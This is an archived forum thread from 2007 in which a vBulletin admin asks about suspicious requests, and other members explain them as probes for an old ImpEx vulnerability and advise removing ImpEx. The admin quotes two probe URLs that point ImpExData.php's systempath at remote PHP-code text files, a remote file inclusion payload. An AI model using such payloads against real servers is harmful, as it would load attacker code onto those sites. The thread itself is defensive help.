PDA

View Full Version : is this hacker's method?


FoReX
10-14-2007, 08:20 PM
While i see Who is online page, i saw this link one quest.

.................................com/forum.php/impex/ImpExData.php?systempath=http://www.cpper.com/c/vbgsitemap/cmd.txt?

http://www.cpper.com/c/vbgsitemap/cmd.txt file include php code..

is this codes harmful? or hackers method?

Marco van Herwaarden
10-15-2007, 06:26 AM
It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.

FoReX
10-15-2007, 07:47 AM
It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.

Thanks marco..

I'm using Vbulletin 3.6.8 and vBadvanced CMPS v3.0 RC1.

can i need any update?

Marco van Herwaarden
10-15-2007, 07:57 AM
You are already running the latest vBulletin. Just make sure you don't have an old (remove or upgrade if needed) of ImpEx on your server.

I don't know about vBadvanced, but the attempt was not addressing vBA.

FoReX
10-15-2007, 10:34 AM
I saw again smiliar links:
..................com/forum.php/impex/clientscript/vbulletin_read_marker.js?v=368and
.........................com/forum.php//impex/ImpExData.php? systempath=http://futurehousingsystems.com/images/control.txt?
if this links harmfull or hackers method we will happy your report ...

ragtek
10-15-2007, 11:02 AM
if you havent "installed" impex(removed it after importing) nothing can happen

nexialys
10-15-2007, 11:21 AM
the person/robot who visit your site with this script is someone willing to verify if you have ImpEx installed... lately, there was some insert/exploits compromissing the presence of ImpEx in your forum... btw, you should be safe as you do not have it installed.

Marco van Herwaarden
10-15-2007, 12:05 PM
lately??

The latest vulnerability in ImpEx was a 1-time error i think over a year ago. See also https://vborg.vbsupport.ru/showpost.php?p=1346977&postcount=13

nexialys
10-15-2007, 12:23 PM
lately can be one year old, remember that people are not updating their ImpEx the same way they change their underwears...

Analogpoint
10-15-2007, 06:54 PM
In any case, you shouldn't have impex on your server unless you're actively importing or exporting something. If not, remove it.